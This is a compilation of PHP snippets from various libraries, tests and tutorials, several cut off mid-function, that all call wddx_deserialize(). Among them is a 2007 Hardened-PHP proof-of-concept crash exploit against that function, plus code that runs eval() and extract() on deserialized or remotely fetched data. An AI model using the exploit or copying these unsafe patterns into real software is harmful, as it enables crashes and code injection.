public function sessionData($key) { $data = $this->_store->get($key); $data = wddx_deserialize($data); $data['ttl'] = $this->_store->ttl($key); return $data; }
/** * @param string $value * @return array */ public function unserialize($value, $defaultValue = array()) { if (!empty($value)) { return wddx_deserialize($value); } return $defaultValue; }
/** * load configuration from a file * * @access public * @param string $configFile full path of the config file * @param array $options various options, depending on the reader * @return array $config complete configuration */ function loadConfigFile($configFile, $options = array()) { if (!function_exists("wddx_add_vars")) { return patErrorManager::raiseError(PATCONFIGURATION_ERROR_DRIVER_NOT_WORKING, "WDDX extension is not installed on your system."); } $fp = @fopen($configFile, "r"); $wddx = fread($fp, filesize($configFile)); $conf = wddx_deserialize($wddx); if ($conf === NULL) { return patErrorManager::raiseError(PATCONFIGURATION_ERROR_CONFIG_INVALID, "{$configFile} is no valid WDDX file."); } return array("config" => $conf, "externalFiles" => array(), "cacheAble" => true); }
function parse_response($data) { // skip HTTP header $data = ltrim(strstr($data, "\r\n\r\n")); $vars = wddx_deserialize($data); if ($vars['login'] === TRUE) { return TRUE; } else { // uh oh, hackers printf("ERROR #%d: %s<br />\n", $vars['error'], $vars['error_str']); return FALSE; } }
public function unserialize($v) { if ($v === NULL) { return NULL; } if (!is_scalar($v)) { return $v; } if ($this->len < 1) { return wddx_deserialize($v); } if (substr($v, 0, $this->len) != $this->prefix) { return $v; } return wddx_deserialize(substr($v, $this->len)); }
/** * Unserialize from WDDX to PHP * * @param string $wddx * @param array $opts * @return mixed * @throws RuntimeException on wddx error */ public function unserialize($wddx, array $opts = array()) { $ret = wddx_deserialize($wddx); if ($ret === null && class_exists('SimpleXMLElement', false)) { // check if the returned NULL is valid // or based on an invalid wddx string try { $simpleXml = new \SimpleXMLElement($wddx); if (isset($simpleXml->data[0]->null[0])) { return null; // valid null } throw new RuntimeException('Invalid wddx'); } catch (\Exception $e) { throw new RuntimeException($e->getMessage(), 0, $e); } } return $ret; }
/** * Unserialize data. * * @param mixed $data The data to be unserialized. * @param mixed $mode The mode of unserialization. Can be either a * single mode or array of modes. If array, will be * unserialized in the order provided. * @param mixed $params Any additional parameters the unserialization * method requires. * * @return mixed Unserialized data. * @throws Horde_Serialize_Exception */ protected static function _unserialize(&$data, $mode, $params = null) { switch ($mode) { case self::NONE: break; case self::RAW: $data = rawurldecode($data); break; case self::URL: $data = urldecode($data); break; case self::WDDX: $data = wddx_deserialize($data); break; case self::BZIP: // $params['small'] = Use bzip2 'small memory' mode? $data = bzdecompress($data, isset($params['small']) ? $params['small'] : false); break; case self::IMAP8: $data = quoted_printable_decode($data); break; case self::IMAPUTF7: $data = Horde_String::convertCharset(Horde_Imap_Client_Utf7imap::Utf7ImapToUtf8($data), 'UTF-8', 'ISO-8859-1'); break; case self::IMAPUTF8: $data = Horde_Mime::encode($data); break; case self::BASIC: $data2 = @unserialize($data); // Unserialize can return false both on error and if $data is the // false value. if ($data2 === false && $data == serialize(false)) { return $data2; } $data = $data2; break; case self::GZ_DEFLATE: $data = gzinflate($data); break; case self::BASE64: $data = base64_decode($data); break; case self::GZ_COMPRESS: $data = gzuncompress($data); break; // $params = Output character set // $params = Output character set case self::UTF7: $data = Horde_String::convertCharset($data, 'utf-7', $params); break; // $params = Output character set // $params = Output character set case self::UTF7_BASIC: $data = self::unserialize($data, array(self::BASIC, self::UTF7), $params); break; case self::JSON: $out = json_decode($data); if (!is_null($out) || strcasecmp($data, 'null') === 0) { return $out; } break; case self::LZF: $data = @lzf_decompress($data); break; } if ($data === false) { throw new Horde_Serialize_Exception('Unserialization failed.'); } return $data; }
/** * Unserialize from WDDX to PHP * * @param string $wddx * @param array $opts * @return mixed * @throws Zend_Serializer_Exception on wddx error */ public function unserialize($wddx, array $opts = array()) { $ret = wddx_deserialize($wddx); if ($ret === null) { // check if the returned NULL is valid // or based on an invalid wddx string try { $oldLibxmlDisableEntityLoader = libxml_disable_entity_loader(true); $dom = new DOMDocument(); $dom->loadXML($wddx); foreach ($dom->childNodes as $child) { if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) { #require_once 'Zend/Serializer/Exception.php'; throw new Zend_Serializer_Exception('Invalid XML: Detected use of illegal DOCTYPE'); } } $simpleXml = simplexml_import_dom($dom); libxml_disable_entity_loader($oldLibxmlDisableEntityLoader); if (isset($simpleXml->data[0]->null[0])) { return null; // valid null } $errMsg = 'Can\'t unserialize wddx string'; } catch (Exception $e) { $errMsg = $e->getMessage(); } #require_once 'Zend/Serializer/Exception.php'; throw new Zend_Serializer_Exception($errMsg); } return $ret; }
<?php // Our assoc array $talk = array('id' => 4, 'title' => 'Dynamic Images in PHP - How and When to Use Them', 'date' => '2002-04-29', 'speaker' => 'Alison Gianotto', 'url' => 'http://www.sdphp.net/talks/ag_image'); // we can serialize the value and // create the packet in one step $ser1 = wddx_serialize_vars('talk'); echo format_packet($ser1, 'In one step'); // or we could serialize it in several steps $packet = wddx_packet_start("One of Alison's talks at SDPHP"); wddx_add_vars($packet, 'talk'); $ser2 = wddx_packet_end($packet); echo format_packet($ser2, 'Making the packet by hand'); // now let's deserialize the packet $vars = wddx_deserialize($ser2); echo "<pre>\n<small>\n"; print_r($vars); echo "</small>\n</pre>\n"; function format_packet($pckt, $title = 'wddx packet') { $re = '/^[^<]/'; $pckt = str_replace('>', ">\n", $pckt); $t = explode("\n", $pckt); $s = "[ {$title} ]<br>\n<pre>\n"; foreach ($t as $line) { if (trim($line) == '') { continue; } elseif (preg_match($re, $line)) { $tmp = explode("\n", str_replace('<', "\n<", $line)); $s .= ' <span style="color: blue;">' . $tmp[0] . "</span>\n" . htmlspecialchars($tmp[1]) . "\n"; } else {
/** * Unserialize from WDDX to PHP * * @param string $wddx * @return mixed * @throws Exception\RuntimeException on wddx error */ public function unserialize($wddx) { $ret = wddx_deserialize($wddx); if ($ret === null && class_exists('SimpleXMLElement', false)) { // check if the returned NULL is valid // or based on an invalid wddx string try { libxml_disable_entity_loader(true); $simpleXml = new \SimpleXMLElement($wddx); libxml_disable_entity_loader(false); if (isset($simpleXml->data[0]->null[0])) { return null; // valid null } throw new Exception\RuntimeException('Unserialization failed: Invalid wddx packet'); } catch (\Exception $e) { throw new Exception\RuntimeException('Unserialization failed: ' . $e->getMessage(), 0, $e); } } return $ret; }
/** * Unserialize from WDDX to PHP * * @param string $wddx * @param array $opts * @return mixed * @throws Zend_Serializer_Exception on wddx error */ public function unserialize($wddx, array $opts = array()) { $ret = wddx_deserialize($wddx); if ($ret === null) { // check if the returned NULL is valid // or based on an invalid wddx string try { $simpleXml = new SimpleXMLElement($wddx); if (isset($simpleXml->data[0]->null[0])) { return null; // valid null } $errMsg = 'Can\'t unserialize wddx string'; } catch (Exception $e) { $errMsg = $e->getMessage(); } //$1 'Zend/Serializer/Exception.php'; throw new Zend_Serializer_Exception($errMsg); } return $ret; }
function _wddx_decode($data) { return wddx_deserialize($data); }
<var name="113301888545229100"> <struct> <var name="max"> <number>10</number> </var> <var name="cache"> <number>4</number> </var> <var name="order"> <struct> <var name="content_113300831086270200"> <struct> <var name="CMS_BUILD"> <string>desc</string> </var> </struct> </var> </struct> </var> </struct> </var> </struct> </var> </struct> </var> </struct> </data> </wddxpacket> WDX; var_dump(wddx_deserialize($wddx));
<?php $message = "<wddxPacket version='1.0'><header><comment>my_command</comment></header><data><struct><var name='handle'><number></number></var></struct></data></wddxPacket>"; print_r(wddx_deserialize($message)); print_r(wddx_deserialize($message));
<?php // Sample REST server - returns uptime information // Jesus M. Castagnetto //$host = 'www.example.com'; //$port = 80; //$serverPath = '/xmlrpc/server.php' $host = 'jmc.sdsc.edu'; $port = 6666; $serverPath = '/misc/ws_rest_sample_server.php'; $packet = file_get_contents("http://{$host}:{$port}{$serverPath}"); $tmp = wddx_deserialize($packet); extract($tmp); $sep = str_repeat('*', 50); echo <<<_END {$sep} Uptime for : {$host} Timestamp (UTC) : {$timestamp} Local time at host : {$uptime['time']} Host has run for : {$uptime['duration']} Number of current users : {$uptime['users']} Average number of jobs in queue 1 minute : {$uptime['load1']} 5 minutes : {$uptime['load5']} 15 minutes : {$uptime['load15']} {$sep} _END; ?>
protected function _removeUserMap($id) { $data = $this->_store->get($id); if (!$data) { return; } $decoded = wddx_deserialize($data); if (!is_array($decoded)) { return false; } $uid = Hash::get($decoded, AuthComponent::$sessionKey . '.id'); if (empty($uid)) { return; } $usermap = $this->_userMapPrefix . ':' . $uid; return $this->_store->del($usermap); }
<?php $path = dirname(__FILE__); $fp = fopen("php://temp", 'w+'); fputs($fp, "<wddxPacket version='1.0'><header><comment>TEST comment</comment></header><data><struct><var name='var1'><null/></var><var name='var2'><string>some string</string></var><var name='var3'><number>756</number></var><var name='var4'><boolean value='true'/></var></struct></data></wddxPacket>"); rewind($fp); var_dump(wddx_deserialize($fp)); fclose($fp);
<?php for ($i = 65; $i < 256; $i++) { if ($i >= 0xc0) { $v = chr(0xc3) . chr($i - 64); } elseif ($i >= 0x80) { $v = chr(0xc2) . chr($i); } else { $v = chr($i); // make it UTF-8 } $ret = wddx_serialize_value($v); echo $ret . "\n"; var_dump(bin2hex($v), bin2hex(wddx_deserialize($ret)), $v == wddx_deserialize($ret)); }
/** * @param $raw * * @return mixed */ public function Decode($raw) { return \wddx_deserialize($raw); }
<?php // Based on MediaWiki's ApiFormatWddxTest // The omitted data in the "b" variable previously caused a fatal error var_dump(wddx_deserialize(<<<EOT <wddxPacket version="1.0"> <header/> <data> <struct> <var name="a"> <string>foo</string> </var> <var name="b"/> </struct> </data> </wddxPacket> EOT ));
<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP - wddx_deserialize() Crash Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // The following testcode will overflow the buffer with lots of C wddx_deserialize("<wddxPacket version='1.0'><header/>\n <data>\n <array length='1'>\n <string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<X />CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC</string>\n <string></string>\n </array>\n </data>\n </wddxPacket>"); ?> # milw0rm.com [2007-03-04]
<?php $path = dirname(__FILE__); var_dump(wddx_deserialize(file_get_contents("{$path}/wddx.xml")));
/** * Unserialize from WDDX to PHP * * @param string $wddx * @return mixed * @throws Exception\RuntimeException on wddx error * @throws Exception\InvalidArgumentException if invalid xml */ public function unserialize($wddx) { $ret = wddx_deserialize($wddx); if ($ret === null && class_exists('SimpleXMLElement', false)) { // check if the returned NULL is valid // or based on an invalid wddx string try { $oldLibxmlDisableEntityLoader = libxml_disable_entity_loader(true); $dom = new \DOMDocument(); $dom->loadXML($wddx); foreach ($dom->childNodes as $child) { if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) { throw new Exception\InvalidArgumentException('Invalid XML: Detected use of illegal DOCTYPE'); } } $simpleXml = simplexml_import_dom($dom); //$simpleXml = new \SimpleXMLElement($wddx); libxml_disable_entity_loader($oldLibxmlDisableEntityLoader); if (isset($simpleXml->data[0]->null[0])) { return null; // valid null } throw new Exception\RuntimeException('Unserialization failed: Invalid wddx packet'); } catch (\Exception $e) { throw new Exception\RuntimeException('Unserialization failed: ' . $e->getMessage(), 0, $e); } } return $ret; }
/** * Write the session data * * @param string $id Session ID * @param string $sessionData Serialized Session Data * * @return boolean */ public function write($id, $sessionData) { if ($this->_settings['json'] === true) { $sessionData = json_encode(wddx_deserialize($sessionData)); } $data = array('data' => $sessionData, 'atime' => time()); $this->_session($id)->setData($data); return $this->_session($id)->store() instanceof RiakObject; }
/** * WDDX中文反解函数 * flash中wddx编码中文传值给php后中文自动解码,php就无法正常解wddx包,为了正常传输wddx封包中文,则中文必须用[wddx]标签包括,例如[wddx]urlencode(中文)[/wddx], * 此函数调用了ubbcode,将封包中的中文编码后,正常解包,然后再将数组中编码的中文解码 * @author 肖飞 * @param string $strWDDX 请求wddx字符串 * @param array $arrKey 需要中文解码的变量数组 * @return array */ public function WDDXdecode($strWDDX) { $objUbbcode = new ubbcode(); $strWDDX = stripslashes(nl2br($strWDDX)); if (count($objUbbcode->ubbParameter($strWDDX))) { $arrData = wddx_deserialize($strWDDX); $strData = var_export($arrData, true); $strData = $objUbbcode->parse($strData); eval("\$arrData = {$strData};"); } else { $strWDDX = $objUbbcode->parse($strWDDX); $arrData = wddx_deserialize($strWDDX); } return $arrData; }
<?php $data = array('01' => 'Zero', '+1' => 'Plus sign', ' 1' => 'Space'); var_dump(wddx_deserialize(wddx_serialize_vars('data')));
/** * @requires function wddx_deserialize */ public function testValidSyntax() { $data = $this->apiRequest('wddx', array('action' => 'query', 'meta' => 'siteinfo')); $this->assertInternalType('array', wddx_deserialize($data)); $this->assertGreaterThan(0, count((array) $data)); }
/** * @param string $encoded * * @return mixed */ public function decode(string $encoded) { return wddx_deserialize($encoded); }
/** * Unpacks a raw string as created by _packSchema into an array * structure for use as $this->_schema * * @access private * @param string $rawFieldString data to be unpacked into the schema * @return array */ function _unpackSchema($rawSchema) { if ($rawSchema[0] == 'a') { $schema = unserialize($rawSchema); } elseif ($rawSchema[0] == '<') { if (!function_exists('wddx_deserialize')) { return $this->raiseError('wddx extension not found!'); } $schema = wddx_deserialize($rawSchema); } else { return $this->raiseError('Unknown schema format'); } $primaryKey = array(); foreach ($schema as $name => $meta) { if (isset($meta['primary_key'])) { $primaryKey[$name] = true; } } if (sizeof($primaryKey)) { $this->_primaryKey = $primaryKey; } else { $this->_primaryKey = array('_rowid' => true); } return $schema; }
<pre> <?php $path = dirname(__FILE__); $data = file_get_contents("{$path}/wddx_packet.xml"); $result = wddx_deserialize($data); print_r($result); ?> </pre>